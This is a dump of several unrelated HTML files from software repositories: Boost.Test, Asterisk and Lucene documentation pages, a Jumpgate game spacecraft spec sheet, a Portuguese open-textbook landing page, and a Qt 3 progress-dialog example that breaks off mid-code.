<li class="listitem"><pre class="literallayout"><span class="keyword">void</span> <a name="idm45194480902928-bb"></a><span class="identifier">increase_exp_fail</span><span class="special">(</span><span class="identifier">counter_t</span> num<span class="special">)</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="keyword">bool</span> <a name="idm45194480901392-bb"></a><span class="identifier">is_enabled</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
<li class="listitem"><pre class="literallayout"><span class="identifier">std</span><span class="special">::</span><span class="identifier">string</span> <a name="idm45194480900272-bb"></a><span class="identifier">full_name</span><span class="special">(</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span></pre></li>
</ol></div>
</div>
</div>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2001-2016 Boost.Test contributors<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../../header/boost/test/tree/test_unit_hpp.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../header/boost/test/tree/test_unit_hpp.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="test_unit_generator.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
public/www/spacecraft/albatross.html | prgra/jgshop | <HTML>
<HEAD>
<META NAME="Author" CONTENT="web front end by Fourmula - http://www.fourmula.com">
<META NAME="Developer" CONTENT="jumpgate developed by NetDevil - http://www.netdevil.com">
<TITLE>Jumpgate - Database:Spacecraft:Albatross</TITLE>
<LINK REL=stylesheet TYPE="text/css" HREF="../../in_game.css">
</HEAD>
<SCRIPT LANGUAGE="JavaScript">
var isIE = navigator.appName.indexOf("Microsoft") != -1;
function updateLocation()
{
if (top.JG_top && top.JG_top.exists)
{
top.JG_top.updateLocation(2,"database");
top.JG_top.updateLocation(3,"spacecraft");
}
}
</SCRIPT>
<BODY BACKGROUND="../../media/background.gif" onLoad="updateLocation();">
<!-- BEGIN CONTENT -->
<!-- INSERT AD -->
<H1 ALIGN="RIGHT">technical specifications </H1>
<BR CLEAR="ALL">
<CENTER>
<!-- BEGIN DESCRIPTION -->
<TABLE CELLPADDING="3" CELLSPACING="1" BORDER="0" BGCOLOR="#222222" ALIGN="CENTER" WIDTH="500">
<TR ALIGN="CENTER" VALIGN="TOP">
<TD BGCOLOR="#334466" COLSPAN="7"><FONT SIZE="+1"><B>"Albatross"</B></FONT></TD>
</TR>
<TR ALIGN="CENTER" VALIGN="MIDDLE">
<TD ROWSPAN="3" COLSPAN="2" BGCOLOR="#000000"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=3,0,0,0"
ID="media/object" WIDTH="300" HEIGHT="250">
<PARAM NAME="movie" VALUE="media/albatross.swf">
<PARAM NAME="quality" VALUE="high">
<PARAM NAME="menu" VALUE="false">
<PARAM NAME="bgcolor" VALUE="#000000">
<EMBED SRC="media/albatross.swf" swLiveConnect="FALSE" WIDTH="300" HEIGHT="250"
QUALITY="high" MENU="false" BGCOLOR="#000000" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" >
</EMBED></OBJECT><BR>
<FONT SIZE="-2">image not to scale</FONT><BR>
</TD>
</TR>
<TR BGCOLOR="#222222" ALIGN="CENTER" VALIGN="TOP">
<TD BGCOLOR="#222222" ROWSPAN="2"><IMG SRC="../../media/pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></TD>
<TD BGCOLOR="#444444"><B>Utility Shuttle</B></TD>
<TD BGCOLOR="#222222" ROWSPAN="2"><IMG SRC="../../media/pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD BGCOLOR="#222222" ALIGN="LEFT"><FONT SIZE="-1">Working from the basic Apteryx design, Octavian engineers made some trade-offs in order to bring to market a relatively inexpensive craft intended to help further the economic development of the Octavian systems. The Albatross provides its pilot with a useful cargo load at the expense of some combat power.</FONT><BR>
</TD>
</TR>
</TABLE>
<BR CLEAR="ALL">
<!-- END DESCRIPTION -->
<!-- BEGIN SPECS -->
<TABLE CELLPADDING=5 CELLSPACING=1 BORDER=0 BGCOLOR="#222222" ALIGN="CENTER" WIDTH="500">
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD ROWSPAN="102" BGCOLOR="#222222"> </TD>
<TD BGCOLOR="#222222" COLSPAN="3"><IMG SRC="../../media/pixel.gif" WIDTH=1 HEIGHT=5 ALT="" BORDER="0"></TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300">Production Center(s):</TD>
<TD CLASS="statgood"><A HREF="../stations/octavius_core.html">Octavius Core</A><BR>
<A HREF="../stations/octavius_great_pillars.html">Octavius Great Pillars</A><BR>
<A HREF="../stations/octavius_outpost.html">Octavius Outpost</A><BR>
</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> CodeName:</TD>
<TD CLASS="statgood">Albatross</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Classification:</TD>
<TD CLASS="statgood">Utility Shuttle</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> TechLevel:</TD>
<TD CLASS="statgood">3</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Size(ucs):</TD>
<TD CLASS="statgood">10.9</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Mass(kg):</TD>
<TD CLASS="statgood">9,500.0</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Engines:</TD>
<TD CLASS="statgood">1</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Engine Size:</TD>
<TD CLASS="statgood">3</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Gun Hardpoints:</TD>
<TD CLASS="statgood">1</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Missile Hardpoints:</TD>
<TD CLASS="statgood">2</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MODx Hardpoints:</TD>
<TD CLASS="statgood">3</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Drag Factor:</TD>
<TD CLASS="statgood">15.23</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Pitch:</TD>
<TD CLASS="statgood">85.0</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Roll:</TD>
<TD CLASS="statgood">75</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Yaw:</TD>
<TD CLASS="statgood">70</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Cargo:</TD>
<TD CLASS="statgood">4</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX PP Size:</TD>
<TD CLASS="statgood">2</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Radar Size:</TD>
<TD CLASS="statgood">1</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX ECM Size:</TD>
<TD CLASS="statgood">1</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Shield Size:</TD>
<TD CLASS="statgood">2</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> MAX Capacitor Size:</TD>
<TD CLASS="statgood">1</TD>
</TR>
</TABLE>
<BR CLEAR="ALL">
<!-- END SPECS -->
<!-- Updated From Database on Wed Mar 26 10:05:49 MST 2003 -->
</CENTER>
<!-- END CONTENT -->
</BODY>
</HTML>
|
doc/Asterisk-Admin-Guide/Asterisk-12-Application_Gosub_26476952.html | truongduy134/asterisk | <!DOCTYPE html>
<html>
<head>
<title>Asterisk Project : Asterisk 12 Application_Gosub</title>
<link rel="stylesheet" href="styles/site.css" type="text/css" />
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body class="theme-default aui-theme-default">
<div id="page">
<div id="main" class="aui-page-panel">
<div id="main-header">
<div id="breadcrumb-section">
<ol id="breadcrumbs">
<li class="first">
<span><a href="index.html">Asterisk Project</a></span>
</li>
<li>
<span><a href="Asterisk-12-Documentation_25919697.html">Asterisk 12 Documentation</a></span>
</li>
<li>
<span><a href="Asterisk-12-Command-Reference_26476688.html">Asterisk 12 Command Reference</a></span>
</li>
<li>
<span><a href="Asterisk-12-Dialplan-Applications_26476696.html">Asterisk 12 Dialplan Applications</a></span>
</li>
</ol>
</div>
<h1 id="title-heading" class="pagetitle">
<span id="title-text">
Asterisk Project : Asterisk 12 Application_Gosub
</span>
</h1>
</div>
<div id="content" class="view">
<div class="page-metadata">
Added by wikibot , edited by wikibot on Aug 29, 2013
</div>
<div id="main-content" class="wiki-content group">
<h1 id="Asterisk12Application_Gosub-Gosub%28%29">Gosub()</h1>
<h3 id="Asterisk12Application_Gosub-Synopsis">Synopsis</h3>
<p>Jump to label, saving return address.</p>
<h3 id="Asterisk12Application_Gosub-Description">Description</h3>
<p>Jumps to the label specified, saving the return address.</p>
<h3 id="Asterisk12Application_Gosub-Syntax">Syntax</h3>
<div class="preformatted panel" style="border-width: 1px;"><div class="preformattedContent panelContent">
<pre>Gosub(context,extenarg1[...]argN)</pre>
</div></div>
<h5 id="Asterisk12Application_Gosub-Arguments">Arguments</h5>
<ul>
<li><code>context</code></li>
<li><code>exten</code></li>
<li><code>priority</code>
<ul>
<li><code>arg1</code></li>
<li><code>argN</code></li>
</ul>
</li>
</ul>
<h3 id="Asterisk12Application_Gosub-SeeAlso">See Also</h3>
<ul>
<li><a href="Asterisk-12-Application_GosubIf_26476953.html">Asterisk 12 Application_GosubIf</a></li>
<li><a href="Asterisk-12-Application_Macro_26476855.html">Asterisk 12 Application_Macro</a></li>
<li><a href="Asterisk-12-Application_Goto_26477167.html">Asterisk 12 Application_Goto</a></li>
<li><a href="Asterisk-12-Application_Return_26476954.html">Asterisk 12 Application_Return</a></li>
<li><a href="Asterisk-12-Application_StackPop_26476955.html">Asterisk 12 Application_StackPop</a></li>
</ul>
<h3 id="Asterisk12Application_Gosub-ImportVersion">Import Version</h3>
<p>This documentation was imported from Asterisk Version Unknown</p>
</div>
</div> </div>
<div id="footer">
<section class="footer-body">
<p>Document generated by Confluence on Dec 20, 2013 14:16</p>
</section>
</div>
</div> </body>
</html>
|
lucene-5.1.0/docs/misc/org/apache/lucene/uninverting/class-use/UninvertingReader.html | marcialhernandez/TecnologiasWeb | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_67) on Thu Apr 09 10:32:35 MDT 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Uses of Class org.apache.lucene.uninverting.UninvertingReader (Lucene 5.1.0 API)</title>
<meta name="date" content="2015-04-09">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.lucene.uninverting.UninvertingReader (Lucene 5.1.0 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/lucene/uninverting/UninvertingReader.html" title="class in org.apache.lucene.uninverting">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/lucene/uninverting/class-use/UninvertingReader.html" target="_top">Frames</a></li>
<li><a href="UninvertingReader.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.lucene.uninverting.UninvertingReader" class="title">Uses of Class<br>org.apache.lucene.uninverting.UninvertingReader</h2>
</div>
<div class="classUseContainer">No usage of org.apache.lucene.uninverting.UninvertingReader</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/lucene/uninverting/UninvertingReader.html" title="class in org.apache.lucene.uninverting">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/lucene/uninverting/class-use/UninvertingReader.html" target="_top">Frames</a></li>
<li><a href="UninvertingReader.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2000-2015 Apache Software Foundation. All Rights Reserved.</i>
<script src='../../../../../prettify.js' type='text/javascript'></script>
<script type='text/javascript'>
(function(){
var oldonload = window.onload;
if (typeof oldonload != 'function') {
window.onload = prettyPrint;
} else {
window.onload = function() {
oldonload();
prettyPrint();
}
}
})();
</script>
</small></p>
</body>
</html>
|
index.html | simas0/Livro-Aberto-de-Matematica-texto-do-projeto- |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Livro Aberto de Matemática</title>
<style></style>
</head>
<body id="preview">
<h1><a id="Livro Aberto do Matemática_0"></a>Livro Aberto do Matemática</h1>
<p> Daqui você pode acessar:</p>
<ul>
<li>O <a href="livro" target="_blank">livro</a> deste piloto - Trata-se de um arco completo sobre frações no Ensino Fundamental</li>
<li>A <a href="wiki" target="_blank"> wiki </a> reservada à equipe organizadora - o acesso é restrito aos organizadores</li>
<li>O <a href="forum" target="_blank">fórum</a> de discussões</li>
</ul>
</body>
</html>
<table border="0" cellspacing="30" cellpadding="20">
<tr>
<td valign="top"> <h4>Resumo do projeto</h4>
<p align="justify">Este é um esforço de professores da Educação Básica e Superior, assim como de entusiastas, para produzir livros didáticos de matemática com licença <a href="https://creativecommons.org/licenses/by-nc-sa/2.5/br/" target="_blank">Creative Commons BY-NC-SA</a>.
Isto garante livre reprodução e distribuição do material para fins não comerciais.
Trabalhos derivados também são permitidos, exigindo-se apenas que tenham esta mesma licensa.
Os financiadores desta empreitada, se reservam o direito de fazer uso comercial do material produzido.
</td>
<td valign="top">
<h4>Como colaborar?</h4>
<p align="justify">Como você pode ver, este é um processo em início de construção.
Espera-se receber apoio da comunidade na elaboração deste material.
Este apoio pode ser de diversas formas: aplicando os recursos em suas aulas e postando considerações sobre os resultados obtidos, enviando sugestões, correções e comentários no fórum ou mesmo editando o texto (este recurso ainda não está disponível).
<h4>Termo de compromisso</h4>
<p align="justify">Ao colaborar com sugestões para este livro você está atestando que é autor do conteúdo e cede, em caráter permanente, os direitos patrimoniais sobre a autoria do material postado.
</td>
</tr>
</table>
|
doc/html/progress-example.html | OS2World/LIB-QT3_Toolkit_Vbox | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- /home/espenr/tmp/qt-3.3.8-espenr-2499/qt-x11-free-3.3.8/examples/progress/progress.doc:4 -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Progress Bar and Dialog Example</title>
<style type="text/css"><!--
fn { margin-left: 1cm; text-indent: -1cm; }
a:link { color: #004faf; text-decoration: none }
a:visited { color: #672967; text-decoration: none }
body { background: #ffffff; color: black; }
--></style>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr bgcolor="#E5E5E5">
<td valign=center>
<a href="index.html">
<font color="#004faf">Home</font></a>
| <a href="classes.html">
<font color="#004faf">All Classes</font></a>
| <a href="mainclasses.html">
<font color="#004faf">Main Classes</font></a>
| <a href="annotated.html">
<font color="#004faf">Annotated</font></a>
| <a href="groups.html">
<font color="#004faf">Grouped Classes</font></a>
| <a href="functions.html">
<font color="#004faf">Functions</font></a>
</td>
<td align="right" valign="center"><img src="logo32.png" align="right" width="64" height="32" border="0"></td></tr></table><h1 align=center>Progress Bar and Dialog Example</h1>
<p>
This example displays either a simple (text-only) or a
custom-labelled (user-supplied widget) progress dialog. It also
demonstrates simple use of menus.
<hr>
<p> Implementation:
<p> <pre>/****************************************************************************
** $Id: progress-example.html 2051 2007-02-21 10:04:20Z chehrlic $
**
** Copyright (C) 1992-2007 Trolltech ASA. All rights reserved.
**
** This file is part of an example program for Qt. This example
** program may be used, distributed and modified without limitation.
**
*****************************************************************************/
#include <<a href="qprogressdialog-h.html">qprogressdialog.h</a>>
#include <<a href="qapplication-h.html">qapplication.h</a>>
#include <<a href="qmenubar-h.html">qmenubar.h</a>>
#include <<a href="qpopupmenu-h.html">qpopupmenu.h</a>>
#include <<a href="qpainter-h.html">qpainter.h</a>>
#include <stdlib.h>
class AnimatedThingy : public <a href="qlabel.html">QLabel</a> {
public:
AnimatedThingy( <a href="qwidget.html">QWidget</a>* parent, const <a href="qstring.html">QString</a>& s ) :
<a href="qlabel.html">QLabel</a>(parent),
label(s),
step(0)
{
setBackgroundColor(white);
label+="\n... and wasting CPU\nwith this animation!\n";
for (int i=0; i<nqix; i++)
ox[0][i] = oy[0][i] = ox[1][i] = oy[1][i] = 0;
x0 = y0 = x1 = y1 = 0;
dx0 = rand()%8+2;
dy0 = rand()%8+2;
dx1 = rand()%8+2;
dy1 = rand()%8+2;
}
void show()
{
if (!isVisible()) startTimer(100);
QWidget::<a href="qwidget.html#show">show</a>();
}
void hide()
{
<a name="x89"></a> QWidget::<a href="qwidget.html#hide">hide</a>();
killTimers();
}
<a href="qsize.html">QSize</a> sizeHint() const
{
return QSize(120,100);
}
protected:
void timerEvent(QTimerEvent*)
{
<a href="qpainter.html">QPainter</a> p(this);
<a name="x76"></a> <a href="qpen.html">QPen</a> pn=p.<a href="qpainter.html#pen">pen</a>();
<a name="x80"></a> pn.<a href="qpen.html#setWidth">setWidth</a>(2);
<a name="x79"></a> pn.<a href="qpen.html#setColor">setColor</a>(backgroundColor());
<a name="x78"></a> p.<a href="qpainter.html#setPen">setPen</a>(pn);
step = (step + 1) % nqix;
<a name="x73"></a> p.<a href="qpainter.html#drawLine">drawLine</a>(ox[0][step], oy[0][step], ox[1][step], oy[1][step]);
inc(x0, dx0, width());
inc(y0, dy0, height());
inc(x1, dx1, width());
inc(y1, dy1, height());
ox[0][step] = x0;
oy[0][step] = y0;
ox[1][step] = x1;
oy[1][step] = y1;
<a href="qcolor.html">QColor</a> c;
<a name="x66"></a> c.<a href="qcolor.html#setHsv">setHsv</a>( (step*255)/nqix, 255, 255 ); // rainbow effect
pn.<a href="qpen.html#setColor">setColor</a>(c);
p.<a href="qpainter.html#setPen">setPen</a>(pn);
p.<a href="qpainter.html#drawLine">drawLine</a>(ox[0][step], oy[0][step], ox[1][step], oy[1][step]);
p.<a href="qpainter.html#setPen">setPen</a>(colorGroup().text());
<a name="x74"></a> p.<a href="qpainter.html#drawText">drawText</a>(rect(), AlignCenter, label);
}
void paintEvent(QPaintEvent* event)
{
<a href="qpainter.html">QPainter</a> p(this);
<a href="qpen.html">QPen</a> pn=p.<a href="qpainter.html#pen">pen</a>();
pn.<a href="qpen.html#setWidth">setWidth</a>(2);
p.<a href="qpainter.html#setPen">setPen</a>(pn);
<a name="x77"></a> p.<a href="qpainter.html#setClipRect">setClipRect</a>(event->rect());
for (int i=0; i<nqix; i++) {
<a href="qcolor.html">QColor</a> c;
c.<a href="qcolor.html#setHsv">setHsv</a>( (i*255)/nqix, 255, 255 ); // rainbow effect
pn.<a href="qpen.html#setColor">setColor</a>(c);
p.<a href="qpainter.html#setPen">setPen</a>(pn);
p.<a href="qpainter.html#drawLine">drawLine</a>(ox[0][i], oy[0][i], ox[1][i], oy[1][i]);
}
p.<a href="qpainter.html#setPen">setPen</a>(colorGroup().text());
p.<a href="qpainter.html#drawText">drawText</a>(rect(), AlignCenter, label);
}
private:
void inc(int& x, int& dx, int b)
{
x+=dx;
if (x<0) { x=0; dx=rand()%8+2; }
else if (x>=b) { x=b-1; dx=-(rand()%8+2); }
}
enum {nqix=10};
int ox[2][nqix];
int oy[2][nqix];
int x0,y0,x1,y1;
int dx0,dy0,dx1,dy1;
<a href="qstring.html">QString</a> label;
int step;
};
class CPUWaster : public <a href="qwidget.html">QWidget</a>
{
<a href="metaobjects.html#Q_OBJECT">Q_OBJECT</a>
enum { first_draw_item = 1000, last_draw_item = 1006 };
int drawItemRects(int id)
{
int n = id - first_draw_item;
int r = 100;
while (n--) r*=(n%3 ? 5 : 4);
return r;
}
<a href="qstring.html">QString</a> drawItemText(int id)
{
<a href="qstring.html">QString</a> str;
str.<a href="qstring.html#sprintf">sprintf</a>("%d Rectangles", drawItemRects(id));
return str;
}
public:
CPUWaster() :
pb(0)
{
menubar = new <a href="qmenubar.html">QMenuBar</a>( this, "menu" );
<a href="qapplication.html#Q_CHECK_PTR">Q_CHECK_PTR</a>( menubar );
<a href="qpopupmenu.html">QPopupMenu</a>* file = new <a href="qpopupmenu.html">QPopupMenu</a>();
<a href="qapplication.html#Q_CHECK_PTR">Q_CHECK_PTR</a>( file );
menubar-><a href="qmenudata.html#insertItem">insertItem</a>( "&File", file );
for (int i=first_draw_item; i<=last_draw_item; i++)
file-><a href="qmenudata.html#insertItem">insertItem</a>( drawItemText(i), i );
<a name="x67"></a> connect( menubar, SIGNAL(<a href="qmenubar.html#activated">activated</a>(int)), this, SLOT(doMenuItem(int)) );
<a name="x69"></a> file-><a href="qmenudata.html#insertSeparator">insertSeparator</a>();
file-><a href="qmenudata.html#insertItem">insertItem</a>( "Quit", qApp, SLOT(<a href="qapplication.html#quit">quit</a>()) );
options = new <a href="qpopupmenu.html">QPopupMenu</a>();
<a href="qapplication.html#Q_CHECK_PTR">Q_CHECK_PTR</a>( options );
menubar-><a href="qmenudata.html#insertItem">insertItem</a>( "&Options", options );
td_id = options-><a href="qmenudata.html#insertItem">insertItem</a>( "Timer driven", this, SLOT(timerDriven()) );
ld_id = options-><a href="qmenudata.html#insertItem">insertItem</a>( "Loop driven", this, SLOT(loopDriven()) );
options-><a href="qmenudata.html#insertSeparator">insertSeparator</a>();
dl_id = options-><a href="qmenudata.html#insertItem">insertItem</a>( "Default label", this, SLOT(defaultLabel()) );
cl_id = options-><a href="qmenudata.html#insertItem">insertItem</a>( "Custom label", this, SLOT(customLabel()) );
options-><a href="qmenudata.html#insertSeparator">insertSeparator</a>();
md_id = options-><a href="qmenudata.html#insertItem">insertItem</a>( "No minimum duration", this, SLOT(toggleMinimumDuration()) );
<a name="x81"></a> options-><a href="qpopupmenu.html#setCheckable">setCheckable</a>( TRUE );
loopDriven();
defaultLabel();
setFixedSize( 400, 300 );
setBackgroundColor( black );
}
public slots:
void doMenuItem(int id)
{
if (id >= first_draw_item && id <= last_draw_item)
draw(drawItemRects(id));
}
void stopDrawing() { got_stop = TRUE; }
void timerDriven()
{
timer_driven = TRUE;
<a name="x71"></a> options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( td_id, TRUE );
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( ld_id, FALSE );
}
void loopDriven()
{
timer_driven = FALSE;
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( ld_id, TRUE );
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( td_id, FALSE );
}
void defaultLabel()
{
default_label = TRUE;
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( dl_id, TRUE );
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( cl_id, FALSE );
}
void customLabel()
{
default_label = FALSE;
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( dl_id, FALSE );
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( cl_id, TRUE );
}
void toggleMinimumDuration()
{
options-><a href="qmenudata.html#setItemChecked">setItemChecked</a>( md_id,
<a name="x70"></a> !options-><a href="qmenudata.html#isItemChecked">isItemChecked</a>( md_id ) );
}
private:
void timerEvent( <a href="qtimerevent.html">QTimerEvent</a>* )
{
if (!got_stop)
<a name="x86"></a><a name="x85"></a> pb-><a href="qprogressdialog.html#setProgress">setProgress</a>( pb-><a href="qprogressdialog.html#totalSteps">totalSteps</a>() - rects );
rects--;
{
<a href="qpainter.html">QPainter</a> p(this);
int ww = width();
int wh = height();
if ( ww > 8 && wh > 8 ) {
<a href="qcolor.html">QColor</a> c(rand()%255, rand()%255, rand()%255);
int x = rand() % (ww-8);
int y = rand() % (wh-8);
int w = rand() % (ww-x);
int h = rand() % (wh-y);
<a name="x75"></a> p.<a href="qpainter.html#fillRect">fillRect</a>( x, y, w, h, c );
}
}
if (!rects || got_stop) {
if (!got_stop)
pb-><a href="qprogressdialog.html#setProgress">setProgress</a>( pb-><a href="qprogressdialog.html#totalSteps">totalSteps</a>() );
<a href="qpainter.html">QPainter</a> p(this);
p.<a href="qpainter.html#fillRect">fillRect</a>(0, 0, width(), height(), backgroundColor());
enableDrawingItems(TRUE);
killTimers();
delete pb;
pb = 0;
}
}
<a href="qprogressdialog.html">QProgressDialog</a>* newProgressDialog( const char* label, int steps, bool modal )
{
<a href="qprogressdialog.html">QProgressDialog</a> *d = new <a href="qprogressdialog.html">QProgressDialog</a>(label, "Cancel", steps, this,
"progress", modal);
if ( options-><a href="qmenudata.html#isItemChecked">isItemChecked</a>( md_id ) )
<a name="x84"></a> d-><a href="qprogressdialog.html#setMinimumDuration">setMinimumDuration</a>(0);
if ( !default_label )
<a name="x83"></a> d-><a href="qprogressdialog.html#setLabel">setLabel</a>( new AnimatedThingy(d,label) );
return d;
}
void enableDrawingItems(bool yes)
{
for (int i=first_draw_item; i<=last_draw_item; i++) {
<a name="x72"></a> menubar-><a href="qmenudata.html#setItemEnabled">setItemEnabled</a>(i, yes);
}
}
void draw(int n)
{
if ( timer_driven ) {
if ( pb ) {
<a href="qapplication.html#qWarning">qWarning</a>("This cannot happen!");
return;
}
rects = n;
pb = newProgressDialog("Drawing rectangles.\n"
"Using timer event.", n, FALSE);
pb-><a href="qwidget.html#setCaption">setCaption</a>("Please Wait");
